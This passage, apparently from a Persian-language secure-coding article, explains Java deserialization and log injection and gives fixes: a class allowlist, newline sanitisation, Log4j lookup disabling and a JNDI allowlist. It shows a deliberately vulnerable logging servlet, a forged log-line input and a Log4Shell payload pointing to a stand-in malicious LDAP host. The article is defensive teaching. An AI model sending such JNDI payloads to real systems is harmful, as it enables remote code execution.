\u062c\u0631\u06cc\u0627\u0646 \u062f\u0631 \u06cc\u06a9 \u0634\u06cc (\u06a9\u0627\u0631\u0628\u0631) \u0627\u0636\u0627\u0641\u0647 \u0645\u06cc \u06a9\u0646\u06cc\u0645.<\/p>\n

public class SecureObjectInputStream extends ObjectInputStream {
\n private static final Set ALLOWED_CLASSES = Set.of(User.class.getName());
\n @Override
\n protected Class resolveClass(ObjectStreamClass osc) throws IOException, ClassNotFoundException {
\n if (!ALLOWED_CLASSES.contains(osc.getName())) {
\n throw new InvalidClassException(“Unauthorized deserialization”, osc.getName());
\n }
\n return super.resolveClass(osc);
\n }
\n }
\n…
\n public class RequestProcessor {
\n protected void doGet(HttpServletRequest request, HttpServletResponse response) {
\n ServletInputStream servletIS = request.getInputStream();
\n ObjectInputStream objectIS = new SecureObjectInputStream(servletIS);
\n User input = (User) objectIS.readObject();
\n }
\n }<\/p>\n

\u0648\u0627\u0631\u062f \u062d\u0627\u0644\u062a \u062a\u0645\u0627\u0645 \u0635\u0641\u062d\u0647 \u0634\u0648\u06cc\u062f<\/p>\n

\u0627\u0632 \u062d\u0627\u0644\u062a \u062a\u0645\u0627\u0645 \u0635\u0641\u062d\u0647 \u062e\u0627\u0631\u062c \u0634\u0648\u06cc\u062f<\/p>\n

\u0642\u0648\u0627\u0646\u06cc\u0646 SonarCloud\/SonarQube \u0648 SonarLint \u06a9\u0647 \u0628\u0647 \u0634\u0646\u0627\u0633\u0627\u06cc\u06cc \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc \u062a\u0632\u0631\u06cc\u0642 deserialization \u06a9\u0645\u06a9 \u0645\u06cc\u200c\u06a9\u0646\u0646\u062f \u0631\u0627 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u06cc\u062f \u062f\u0631 \u0627\u06cc\u0646\u062c\u0627 \u067e\u06cc\u062f\u0627 \u06a9\u0646\u06cc\u062f.<\/p>\n

\u062a\u0632\u0631\u06cc\u0642 \u0686\u0648\u0628<\/p>\n

\u0633\u06cc\u0633\u062a\u0645 \u062b\u0628\u062a \u06af\u0632\u0627\u0631\u0634 \u06cc\u06a9 \u062c\u0632\u0621 \u0646\u0631\u0645 \u0627\u0641\u0632\u0627\u0631\u06cc \u06cc\u0627 \u0633\u0631\u0648\u06cc\u0633\u06cc \u0627\u0633\u062a \u06a9\u0647 \u0628\u0631\u0627\u06cc \u0636\u0628\u0637 \u0631\u0648\u06cc\u062f\u0627\u062f\u0647\u0627\u060c \u067e\u06cc\u0627\u0645 \u0647\u0627 \u0648 \u0633\u0627\u06cc\u0631 \u062f\u0627\u062f\u0647 \u0647\u0627\u06cc \u062a\u0648\u0644\u06cc\u062f \u0634\u062f\u0647 \u062a\u0648\u0633\u0637 \u0628\u0631\u0646\u0627\u0645\u0647 \u0647\u0627\u060c \u0633\u06cc\u0633\u062a\u0645 \u0647\u0627 \u06cc\u0627 \u062f\u0633\u062a\u06af\u0627\u0647 \u0647\u0627 \u0637\u0631\u0627\u062d\u06cc \u0634\u062f\u0647 \u0627\u0633\u062a. \u06af\u0632\u0627\u0631\u0634 \u0647\u0627 \u0628\u0631\u0627\u06cc \u0646\u0638\u0627\u0631\u062a\u060c \u0639\u06cc\u0628 \u06cc\u0627\u0628\u06cc\u060c \u0645\u0645\u06cc\u0632\u06cc \u0648 \u062a\u062c\u0632\u06cc\u0647 \u0648 \u062a\u062d\u0644\u06cc\u0644 \u0646\u0631\u0645 \u0627\u0641\u0632\u0627\u0631 \u0648 \u0631\u0641\u062a\u0627\u0631 \u0648 \u0639\u0645\u0644\u06a9\u0631\u062f \u0633\u06cc\u0633\u062a\u0645 \u0636\u0631\u0648\u0631\u06cc \u0647\u0633\u062a\u0646\u062f.<\/p>\n

\u0645\u0639\u0645\u0648\u0644\u0627\u064b\u060c \u0627\u06cc\u0646 \u0628\u0631\u0646\u0627\u0645\u0647\u200c\u0647\u0627 \u0634\u06a9\u0633\u062a\u200c\u0647\u0627\u060c \u062a\u0644\u0627\u0634\u200c\u0647\u0627 \u0628\u0631\u0627\u06cc \u0648\u0631\u0648\u062f \u0628\u0647 \u0633\u06cc\u0633\u062a\u0645 \u0648 \u062d\u062a\u06cc \u0645\u0648\u0641\u0642\u06cc\u062a\u200c\u0647\u0627\u06cc\u06cc \u0631\u0627 \u062b\u0628\u062a \u0645\u06cc\u200c\u06a9\u0646\u0646\u062f \u06a9\u0647 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u0646\u062f \u062f\u0631 \u0635\u0648\u0631\u062a \u0628\u0631\u0648\u0632 \u0645\u0634\u06a9\u0644 \u062f\u0631 \u0627\u0634\u06a9\u0627\u0644\u200c\u0632\u062f\u0627\u06cc\u06cc \u06a9\u0645\u06a9 \u06a9\u0646\u0646\u062f.<\/p>\n

\u0627\u0645\u0627\u060c \u0622\u0646\u0647\u0627 \u0647\u0645\u0686\u0646\u06cc\u0646 \u0645\u06cc \u062a\u0648\u0627\u0646\u0646\u062f \u0628\u0647 \u06cc\u06a9 \u0628\u0631\u062f\u0627\u0631 \u062d\u0645\u0644\u0647 \u062a\u0628\u062f\u06cc\u0644 \u0634\u0648\u0646\u062f.<\/p>\n

\u062a\u0632\u0631\u06cc\u0642 \u0644\u0627\u06af \u0646\u0648\u0639\u06cc \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc \u0627\u0645\u0646\u06cc\u062a\u06cc \u0627\u0633\u062a \u06a9\u0647 \u062f\u0631 \u0622\u0646 \u0645\u0647\u0627\u062c\u0645 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u062f \u0641\u0627\u06cc\u0644\u200c\u0647\u0627\u06cc \u06af\u0632\u0627\u0631\u0634 \u0631\u0627 \u0628\u0627 \u062a\u0632\u0631\u06cc\u0642 \u0648\u0631\u0648\u062f\u06cc \u0645\u062e\u0631\u0628 \u0628\u0647 \u0622\u0646\u200c\u0647\u0627 \u062f\u0633\u062a\u06a9\u0627\u0631\u06cc \u06a9\u0646\u062f. \u0627\u06af\u0631 \u0633\u06cc\u0627\u0647\u0647\u0647\u0627 \u0628\u0647 \u062f\u0631\u0633\u062a\u06cc \u0636\u062f \u0639\u0641\u0648\u0646\u06cc \u0646\u0634\u0648\u0646\u062f\u060c \u0645\u06cc \u062a\u0648\u0627\u0646\u062f \u0645\u0646\u062c\u0631 \u0628\u0647 \u0686\u0646\u062f\u06cc\u0646 \u0645\u0634\u06a9\u0644 \u0627\u0645\u0646\u06cc\u062a\u06cc \u0634\u0648\u062f.<\/p>\n

\u0647\u0646\u06af\u0627\u0645\u06cc \u06a9\u0647 \u0645\u0647\u0627\u062c\u0645 \u0645\u062d\u062a\u0648\u0627\u06cc \u06af\u0632\u0627\u0631\u0634 \u0631\u0627 \u062a\u063a\u06cc\u06cc\u0631 \u0645\u06cc \u062f\u0647\u062f \u062a\u0627 \u0622\u0646\u0647\u0627 \u0631\u0627 \u062e\u0631\u0627\u0628 \u06a9\u0646\u062f \u06cc\u0627 \u0627\u0637\u0644\u0627\u0639\u0627\u062a \u0646\u0627\u062f\u0631\u0633\u062a \u0631\u0627 \u0628\u0631\u0627\u06cc \u0627\u06cc\u062c\u0627\u062f \u0645\u0634\u06a9\u0644 \u062f\u0631 \u062a\u062c\u0632\u06cc\u0647 \u0648 \u062a\u062d\u0644\u06cc\u0644 \u0622\u0646\u0647\u0627 \u06cc\u0627 \u0634\u06a9\u0633\u062a\u0646 \u062a\u062c\u0632\u06cc\u0647 \u06a9\u0646\u0646\u062f\u0647 \u0647\u0627\u06cc \u06af\u0632\u0627\u0631\u0634\u060c \u0648 \u0647\u0645\u0686\u0646\u06cc\u0646 \u0633\u0648\u0621 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u0633\u06cc\u0633\u062a\u0645 \u0647\u0627\u06cc \u0645\u062f\u06cc\u0631\u06cc\u062a \u06af\u0632\u0627\u0631\u0634\u060c \u06a9\u0647 \u062f\u0631 \u0622\u0646 \u0645\u0647\u0627\u062c\u0645 \u0633\u06cc\u0627\u0647\u0647 \u0647\u0627 \u0631\u0627 \u0628\u0647 \u0622\u0646\u0647\u0627 \u062a\u0632\u0631\u06cc\u0642 \u0645\u06cc \u06a9\u0646\u062f\u060c \u0645\u06cc \u062a\u0648\u0627\u0646\u06cc\u0645 \u0645\u0633\u0627\u0626\u0644\u06cc \u0645\u0627\u0646\u0646\u062f \u062c\u0639\u0644 \u06af\u0632\u0627\u0631\u0634 \u0648 \u0622\u0644\u0648\u062f\u06af\u06cc \u067e\u06cc\u062f\u0627 \u06a9\u0646\u06cc\u0645. \u0627\u0632 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc\u200c\u0647\u0627 \u062f\u0631 \u0633\u06cc\u0633\u062a\u0645\u200c\u0647\u0627\u06cc \u0645\u062f\u06cc\u0631\u06cc\u062a \u06af\u0632\u0627\u0631\u0634 \u0633\u0648\u0621 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0645\u06cc\u200c\u06a9\u0646\u062f \u06a9\u0647 \u0645\u0646\u062c\u0631 \u0628\u0647 \u062d\u0645\u0644\u0627\u062a \u0628\u06cc\u0634\u062a\u0631 \u0645\u0627\u0646\u0646\u062f \u0627\u062c\u0631\u0627\u06cc \u06a9\u062f \u0627\u0632 \u0631\u0627\u0647 \u062f\u0648\u0631 \u0645\u06cc\u200c\u0634\u0648\u062f.<\/p>\n

\u0628\u06cc\u0627\u06cc\u06cc\u062f \u06a9\u062f \u0632\u06cc\u0631 \u0631\u0627 \u062f\u0631 \u0646\u0638\u0631 \u0628\u06af\u06cc\u0631\u06cc\u0645\u060c \u062c\u0627\u06cc\u06cc \u06a9\u0647 \u06cc\u06a9 \u0645\u0642\u062f\u0627\u0631 \u0627\u0632 \u06a9\u0627\u0631\u0628\u0631 \u0645\u06cc \u06af\u06cc\u0631\u06cc\u0645 \u0648 \u0622\u0646 \u0631\u0627 \u062b\u0628\u062a \u0645\u06cc \u06a9\u0646\u06cc\u0645.<\/p>\n

public void doGet(HttpServletRequest request, HttpServletResponse response) {
\n String user = request.getParameter(“user”);
\n if (user != null){
\n logger.log(Level.INFO, “User: {0} login in”, user);
\n }
\n }<\/p>\n

\u0648\u0627\u0631\u062f \u062d\u0627\u0644\u062a \u062a\u0645\u0627\u0645 \u0635\u0641\u062d\u0647 \u0634\u0648\u06cc\u062f<\/p>\n

\u0627\u0632 \u062d\u0627\u0644\u062a \u062a\u0645\u0627\u0645 \u0635\u0641\u062d\u0647 \u062e\u0627\u0631\u062c \u0634\u0648\u06cc\u062f<\/p>\n

\u0628\u06cc \u0636\u0631\u0631 \u0628\u0647 \u0646\u0638\u0631 \u0645\u06cc \u0631\u0633\u062f\u060c \u062f\u0631\u0633\u062a \u0627\u0633\u062a\u061f<\/p>\n

\u0627\u0645\u0627 \u0627\u06af\u0631 \u0645\u0647\u0627\u062c\u0645 \u0628\u062e\u0648\u0627\u0647\u062f \u0628\u0627 \u0627\u06cc\u0646 \u06a9\u0627\u0631\u0628\u0631 \u0648\u0627\u0631\u062f \u0634\u0648\u062f \u0686\u0647\u061f<\/p>\n

john login in\\n2024-08-19 12:34:56 INFO User ‘admin’ login in<\/p>\n

\u0648\u0627\u0631\u062f \u062d\u0627\u0644\u062a \u062a\u0645\u0627\u0645 \u0635\u0641\u062d\u0647 \u0634\u0648\u06cc\u062f<\/p>\n

\u0627\u0632 \u062d\u0627\u0644\u062a \u062a\u0645\u0627\u0645 \u0635\u0641\u062d\u0647 \u062e\u0627\u0631\u062c \u0634\u0648\u06cc\u062f<\/p>\n

\u0628\u0647 \u0648\u0636\u0648\u062d \u06cc\u06a9 \u0646\u0627\u0645 \u06a9\u0627\u0631\u0628\u0631\u06cc \u0627\u0634\u062a\u0628\u0627\u0647 \u0627\u0633\u062a \u0648 \u0646\u0627\u0645\u0648\u0641\u0642 \u062e\u0648\u0627\u0647\u062f \u0628\u0648\u062f. \u0627\u0645\u0627\u060c \u062b\u0628\u062a \u062e\u0648\u0627\u0647\u062f \u0634\u062f \u0648 \u0634\u062e\u0635\u06cc \u06a9\u0647 \u0644\u0627\u06af \u0631\u0627 \u0628\u0631\u0631\u0633\u06cc \u0645\u06cc \u06a9\u0646\u062f \u0628\u0633\u06cc\u0627\u0631 \u06af\u06cc\u062c \u0645\u06cc \u0634\u0648\u062f<\/p>\n

2024-08-19 12:34:56 INFO User ‘john’ login in
\n 2024-08-19 12:34:56 ERROR User ‘admin’ login in <\/p>\n

\u0648\u0627\u0631\u062f \u062d\u0627\u0644\u062a \u062a\u0645\u0627\u0645 \u0635\u0641\u062d\u0647 \u0634\u0648\u06cc\u062f<\/p>\n

\u0627\u0632 \u062d\u0627\u0644\u062a \u062a\u0645\u0627\u0645 \u0635\u0641\u062d\u0647 \u062e\u0627\u0631\u062c \u0634\u0648\u06cc\u062f<\/p>\n

\u06cc\u0627 \u062d\u062a\u06cc \u0628\u062f\u062a\u0631!! \u0627\u06af\u0631 \u0645\u0647\u0627\u062c\u0645 \u0628\u062f\u0627\u0646\u062f \u06a9\u0647 \u0633\u06cc\u0633\u062a\u0645 \u0627\u0632 \u06cc\u06a9 \u0646\u0633\u062e\u0647 Log4J \u0628\u062f\u0648\u0646 \u0648\u0635\u0644\u0647 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0645\u06cc \u06a9\u0646\u062f\u060c \u0645\u06cc \u062a\u0648\u0627\u0646\u062f \u0645\u0642\u062f\u0627\u0631 \u0632\u06cc\u0631 \u0631\u0627 \u0628\u0647 \u0639\u0646\u0648\u0627\u0646 \u06a9\u0627\u0631\u0628\u0631 \u0627\u0631\u0633\u0627\u0644 \u06a9\u0646\u062f \u0648 \u0633\u06cc\u0633\u062a\u0645 \u0627\u0632 \u0627\u062c\u0631\u0627\u06cc \u0627\u0632 \u0631\u0627\u0647 \u062f\u0648\u0631 \u0631\u0646\u062c \u0645\u06cc \u0628\u0631\u062f. \u0633\u0631\u0648\u0631 LDAP \u06a9\u0647 \u062a\u0648\u0633\u0637 \u0645\u0647\u0627\u062c\u0645 \u06a9\u0646\u062a\u0631\u0644 \u0645\u06cc \u0634\u0648\u062f \u0628\u0627 \u0627\u0631\u062c\u0627\u0639 \u0628\u0647 \u06a9\u0644\u0627\u0633 \u0645\u062e\u0631\u0628 \u062c\u0627\u0648\u0627 \u06a9\u0647 \u0631\u0648\u06cc \u06cc\u06a9 \u0633\u0631\u0648\u0631 \u0631\u0627\u0647 \u062f\u0648\u0631 \u0645\u06cc\u0632\u0628\u0627\u0646\u06cc \u0634\u062f\u0647 \u0627\u0633\u062a \u067e\u0627\u0633\u062e \u0645\u06cc \u062f\u0647\u062f. \u0628\u0631\u0646\u0627\u0645\u0647 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631 \u0627\u06cc\u0646 \u06a9\u0644\u0627\u0633 \u0631\u0627 \u062f\u0627\u0646\u0644\u0648\u062f \u0648 \u0627\u062c\u0631\u0627 \u0645\u06cc \u06a9\u0646\u062f \u0648 \u0628\u0647 \u0645\u0647\u0627\u062c\u0645 \u06a9\u0646\u062a\u0631\u0644 \u0633\u0631\u0648\u0631 \u0631\u0627 \u0645\u06cc \u062f\u0647\u062f.<\/p>\n

$ { jndi:ldap:\/\/malicious-server.com\/a}<\/p>\n

\u0648\u0627\u0631\u062f \u062d\u0627\u0644\u062a \u062a\u0645\u0627\u0645 \u0635\u0641\u062d\u0647 \u0634\u0648\u06cc\u062f<\/p>\n

\u0627\u0632 \u062d\u0627\u0644\u062a \u062a\u0645\u0627\u0645 \u0635\u0641\u062d\u0647 \u062e\u0627\u0631\u062c \u0634\u0648\u06cc\u062f<\/p>\n

\u0627\u0645\u0627 \u0628\u0647 \u0631\u0627\u062d\u062a\u06cc \u0645\u06cc \u062a\u0648\u0627\u0646\u06cc\u0645 \u0627\u0632 \u0627\u06cc\u0646 \u0645\u0633\u0627\u0626\u0644 \u062c\u0644\u0648\u06af\u06cc\u0631\u06cc \u06a9\u0646\u06cc\u0645.<\/p>\n

\u067e\u0627\u06a9\u0633\u0627\u0632\u06cc \u0645\u0642\u0627\u062f\u06cc\u0631\u06cc \u06a9\u0647 \u0628\u0627\u06cc\u062f \u062b\u0628\u062a \u0634\u0648\u0646\u062f \u0628\u0631\u0627\u06cc \u062c\u0644\u0648\u06af\u06cc\u0631\u06cc \u0627\u0632 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc \u062c\u0639\u0644 \u06af\u0632\u0627\u0631\u0634 \u0645\u0647\u0645 \u0627\u0633\u062a\u060c \u0632\u06cc\u0631\u0627 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u062f \u0645\u0646\u062c\u0631 \u0628\u0647 \u062e\u0631\u0648\u062c\u06cc\u200c\u0647\u0627\u06cc \u06af\u06cc\u062c\u200c\u06a9\u0646\u0646\u062f\u0647 \u062c\u0639\u0644\u06cc \u062a\u0648\u0633\u0637 \u06a9\u0627\u0631\u0628\u0631 \u0634\u0648\u062f.<\/p>\n

\/\/ Log the sanitised username
\n String user = sanitiseInput(request.getParameter(“user”));
\n }<\/p>\n

private String sanitiseInput(String input) {
\n \/\/ Replace newline and carriage return characters with a safe placeholder
\n if (input != null) {
\n input = input.replaceAll(“[\\\\n\\\\r]”, “_”);
\n }
\n return input;
\n }<\/p>\n

\u0648\u0627\u0631\u062f \u062d\u0627\u0644\u062a \u062a\u0645\u0627\u0645 \u0635\u0641\u062d\u0647 \u0634\u0648\u06cc\u062f<\/p>\n

\u0627\u0632 \u062d\u0627\u0644\u062a \u062a\u0645\u0627\u0645 \u0635\u0641\u062d\u0647 \u062e\u0627\u0631\u062c \u0634\u0648\u06cc\u062f<\/p>\n

\u0646\u062a\u06cc\u062c\u0647\u200c\u0627\u06cc \u06a9\u0647 \u062f\u0631 \u0644\u0627\u06af\u200c\u0647\u0627 \u062e\u0648\u0627\u0647\u06cc\u0645 \u062f\u06cc\u062f \u0628\u0647 \u0635\u0648\u0631\u062a \u0632\u06cc\u0631 \u0627\u0633\u062a\u060c \u0648 \u0627\u06a9\u0646\u0648\u0646 \u0622\u0633\u0627\u0646\u200c\u062a\u0631 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646 \u0645\u0634\u0627\u0647\u062f\u0647 \u06a9\u0631\u062f \u06a9\u0647 \u0647\u0645\u0647 \u06af\u0632\u0627\u0631\u0634\u200c\u0647\u0627 \u0628\u0647 \u06cc\u06a9 \u0641\u0631\u0627\u062e\u0648\u0627\u0646\u06cc \u0628\u0647 \u0633\u06cc\u0633\u062a\u0645 \u06af\u0632\u0627\u0631\u0634 \u062a\u0639\u0644\u0642 \u062f\u0627\u0631\u0646\u062f.<\/p>\n

2024-08-19 12:34:56 INFO User ‘john’ login in_2024-08-19 12:34:56 ERROR User ‘admin’ login in <\/p>\n

\u0648\u0627\u0631\u062f \u062d\u0627\u0644\u062a \u062a\u0645\u0627\u0645 \u0635\u0641\u062d\u0647 \u0634\u0648\u06cc\u062f<\/p>\n

\u0627\u0632 \u062d\u0627\u0644\u062a \u062a\u0645\u0627\u0645 \u0635\u0641\u062d\u0647 \u062e\u0627\u0631\u062c \u0634\u0648\u06cc\u062f<\/p>\n

\u0628\u0647 \u0645\u0646\u0638\u0648\u0631 \u062c\u0644\u0648\u06af\u06cc\u0631\u06cc \u0627\u0632 \u0633\u0648\u0621 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u062f\u0631 \u0633\u06cc\u0633\u062a\u0645 \u06af\u0632\u0627\u0631\u0634\u200c\u06af\u06cc\u0631\u06cc\u060c \u0645\u0647\u0645 \u0627\u0633\u062a \u06a9\u0647 \u06a9\u062a\u0627\u0628\u062e\u0627\u0646\u0647\u200c\u0647\u0627\u06cc\u0645\u0627\u0646 \u0631\u0627 \u062a\u0627 \u062d\u062f \u0627\u0645\u06a9\u0627\u0646 \u0628\u0647 \u0622\u062e\u0631\u06cc\u0646 \u0646\u0633\u062e\u0647\u200c\u0647\u0627\u06cc \u067e\u0627\u06cc\u062f\u0627\u0631 \u0628\u0647\u200c\u0631\u0648\u0632 \u0646\u06af\u0647 \u062f\u0627\u0631\u06cc\u0645. \u0628\u0631\u0627\u06cc log4j\u060c \u0622\u0646 \u0627\u0635\u0644\u0627\u062d \u0639\u0645\u0644\u06a9\u0631\u062f \u0631\u0627 \u063a\u06cc\u0631\u0641\u0639\u0627\u0644 \u0645\u06cc \u06a9\u0646\u062f. \u0645\u0627 \u0647\u0645\u0686\u0646\u06cc\u0646 \u0645\u06cc \u062a\u0648\u0627\u0646\u06cc\u0645 \u0628\u0647 \u0635\u0648\u0631\u062a \u062f\u0633\u062a\u06cc JNDI \u0631\u0627 \u063a\u06cc\u0631\u0641\u0639\u0627\u0644 \u06a9\u0646\u06cc\u0645.<\/p>\n

-Dlog4j2.formatMsgNoLookups=true<\/p>\n

\u0648\u0627\u0631\u062f \u062d\u0627\u0644\u062a \u062a\u0645\u0627\u0645 \u0635\u0641\u062d\u0647 \u0634\u0648\u06cc\u062f<\/p>\n

\u0627\u0632 \u062d\u0627\u0644\u062a \u062a\u0645\u0627\u0645 \u0635\u0641\u062d\u0647 \u062e\u0627\u0631\u062c \u0634\u0648\u06cc\u062f<\/p>\n

\u0627\u06af\u0631 \u0647\u0645\u0686\u0646\u0627\u0646 \u0646\u06cc\u0627\u0632 \u0628\u0647 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 JNDI \u062f\u0627\u0631\u06cc\u062f\u060c \u06cc\u06a9 \u0641\u0631\u0622\u06cc\u0646\u062f \u0636\u062f\u0639\u0641\u0648\u0646\u06cc \u0645\u0639\u0645\u0648\u0644 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u062f \u0628\u0627 \u0628\u0631\u0631\u0633\u06cc \u0645\u0642\u0635\u062f \u062f\u0631 \u0644\u06cc\u0633\u062a \u0645\u0642\u0635\u062f\u0647\u0627\u06cc \u0645\u062c\u0627\u0632\u060c \u0627\u0632 \u062d\u0645\u0644\u0627\u062a \u0645\u062e\u0631\u0628 \u062c\u0644\u0648\u06af\u06cc\u0631\u06cc \u06a9\u0646\u062f.<\/p>\n

public class AllowedlistJndiContextFactory implements InitialContextFactory {
\n \/\/ Define your list of allowed JNDI URLs
\n private static final List ALLOWED_JNDI_PREFIXES = Arrays.asList(
\n “ldap:\/\/trusted-server.com”,
\n “ldaps:\/\/secure-server.com”
\n );<\/p>\n

@Override
\n public Context getInitialContext(Hashtable environment) throws NamingException {
\n String providerUrl = (String) environment.get(Context.PROVIDER_URL);<\/p>\n

if (isAllowed(providerUrl)) {
\n return new InitialContext(environment);
\n } else {
\n throw new NamingException(“JNDI lookup ” + providerUrl + ” not allowed”);
\n }
\n }<\/p>\n

private boolean isAllowed(String url) {
\n if (url == null) {
\n return false;
\n }
\n for (String allowedPrefix : ALLOWED_JNDI_PREFIXES) {
\n if (url.startsWith(allowedPrefix)) {
\n return true;
\n }
\n }
\n return false;
\n }
\n}<\/p>\n

\u0648\u0627\u0631\u062f \u062d\u0627\u0644\u062a \u062a\u0645\u0627\u0645 \u0635\u0641\u062d\u0647 \u0634\u0648\u06cc\u062f<\/p>\n

\u0627\u0632 \u062d\u0627\u0644\u062a \u062a\u0645\u0627\u0645 \u0635\u0641\u062d\u0647 \u062e\u0627\u0631\u062c \u0634\u0648\u06cc\u062f<\/p>\n

\u0648 \u0633\u06cc\u0633\u062a\u0645 \u0645\u0627 \u0631\u0627 \u0628\u0631\u0627\u06cc \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u06a9\u0627\u0631\u062e\u0627\u0646\u0647 \u0632\u0645\u06cc\u0646\u0647 \u0641\u06cc\u0644\u062a\u0631 \u067e\u06cc\u06a9\u0631\u0628\u0646\u062f\u06cc \u06a9\u0646\u06cc\u062f.<\/p>\n

-Djava.naming.factory.initial=com.yourpackage.AllowedlistJndiContextFactory<\/p>\n

\u0648\u0627\u0631\u062f \u062d\u0627\u0644\u062a \u062a\u0645\u0627\u0645 \u0635\u0641\u062d\u0647 \u0634\u0648\u06cc\u062f<\/p>\n

\u0627\u0632 \u062d\u0627\u0644\u062a \u062a\u0645\u0627\u0645 \u0635\u0641\u062d\u0647 \u062e\u0627\u0631\u062c \u0634\u0648\u06cc\u062f<\/p>\n

\u0642\u0648\u0627\u0646\u06cc\u0646 SonarCloud\/SonarQube \u0648 SonarLint \u06a9\u0647 \u0628\u0647 \u0634\u0646\u0627\u0633\u0627\u06cc\u06cc \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc \u062a\u0632\u0631\u06cc\u0642 \u0648\u0631\u0648\u062f \u0628\u0647 \u0633\u06cc\u0633\u062a\u0645 \u06a9\u0645\u06a9 \u0645\u06cc\u200c\u06a9\u0646\u0646\u062f \u0631\u0627 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u06cc\u062f \u062f\u0631 \u0627\u06cc\u0646\u062c\u0627 \u067e\u06cc\u062f\u0627 \u06a9\u0646\u06cc\u062f.<\/p>\n

\u0646\u062a\u06cc\u062c\u0647 \u06af\u06cc\u0631\u06cc<\/p>\n

\u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc\u200c\u0647\u0627\u06cc \u0627\u0645\u0646\u06cc\u062a\u06cc \u0641\u0642\u0637 \u0646\u06af\u0631\u0627\u0646\u06cc\u200c\u0647\u0627\u06cc \u062a\u0626\u0648\u0631\u06cc \u0646\u06cc\u0633\u062a\u0646\u062f\u060c \u0628\u0644\u06a9\u0647 \u062a\u0647\u062f\u06cc\u062f\u0647\u0627\u06cc \u0648\u0627\u0642\u0639\u06cc \u0647\u0633\u062a\u0646\u062f \u06a9\u0647 \u0642\u0628\u0644\u0627\u064b \u0634\u0631\u06a9\u062a\u200c\u0647\u0627\u06cc \u0628\u0632\u0631\u06af \u0631\u0627 \u062a\u062d\u062a \u062a\u0623\u062b\u06cc\u0631 \u0642\u0631\u0627\u0631 \u062f\u0627\u062f\u0647 \u0648 \u0645\u0646\u062c\u0631 \u0628\u0647 \u0622\u0633\u06cc\u0628 \u0645\u0627\u0644\u06cc \u0648 \u0627\u0639\u062a\u0628\u0627\u0631 \u0642\u0627\u0628\u0644 \u062a\u0648\u062c\u0647\u06cc \u0634\u062f\u0647 \u0627\u0633\u062a.<\/p>\n

\u0627\u0632 \u062a\u0632\u0631\u06cc\u0642\u200c\u0647\u0627\u06cc SQL \u06af\u0631\u0641\u062a\u0647 \u062a\u0627 \u062a\u0632\u0631\u06cc\u0642\u200c\u0647\u0627\u06cc Deserialization \u0648 Logging\u060c \u0627\u06cc\u0646 \u0628\u0631\u062f\u0627\u0631\u0647\u0627\u06cc \u062d\u0645\u0644\u0647 \u0631\u0627\u06cc\u062c \u0647\u0633\u062a\u0646\u062f \u0648 \u0627\u06af\u0631 \u0628\u0647 \u062f\u0631\u0633\u062a\u06cc \u0645\u0648\u0631\u062f \u062a\u0648\u062c\u0647 \u0642\u0631\u0627\u0631 \u0646\u06af\u06cc\u0631\u0646\u062f\u060c \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u0646\u062f \u0628\u0647 \u0631\u0627\u062d\u062a\u06cc \u0627\u0632 \u06a9\u062f \u0646\u0627\u0627\u0645\u0646 \u0633\u0648\u0621 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u06a9\u0646\u0646\u062f.<\/p>\n

\u0628\u0627 \u062f\u0631\u06a9 \u0645\u0627\u0647\u06cc\u062a \u0627\u06cc\u0646 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc\u200c\u0647\u0627 \u0648 \u0627\u062c\u0631\u0627\u06cc \u0627\u0635\u0644\u0627\u062d\u0627\u062a \u062a\u0648\u0635\u06cc\u0647\u200c\u0634\u062f\u0647\u060c \u0645\u0627\u0646\u0646\u062f \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u067e\u0631\u0633\u200c\u0648\u200c\u062c\u0648\u0647\u0627\u06cc \u067e\u0627\u0631\u0627\u0645\u062a\u0631\u06cc\u060c \u0627\u062c\u062a\u0646\u0627\u0628 \u0627\u0632 \u0634\u06cc\u0648\u0647\u200c\u0647\u0627\u06cc \u063a\u06cc\u0631\u0627\u06cc\u0645\u0646\u200c\u0632\u062f\u0627\u06cc\u06cc \u0648 \u0627\u06cc\u0645\u0646\u200c\u0633\u0627\u0632\u06cc \u0645\u0646\u0627\u0633\u0628 \u0686\u0627\u0631\u0686\u0648\u0628\u200c\u0647\u0627\u06cc \u06af\u0632\u0627\u0631\u0634\u200c\u06af\u06cc\u0631\u06cc\u060c \u062a\u0648\u0633\u0639\u0647\u200c\u062f\u0647\u0646\u062f\u06af\u0627\u0646 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u0646\u062f \u062e\u0637\u0631 \u0627\u06cc\u0646 \u062d\u0645\u0644\u0627\u062a \u0631\u0627 \u0628\u0647 \u0645\u06cc\u0632\u0627\u0646 \u0642\u0627\u0628\u0644 \u062a\u0648\u062c\u0647\u06cc \u06a9\u0627\u0647\u0634 \u062f\u0647\u0646\u062f.<\/p>\n

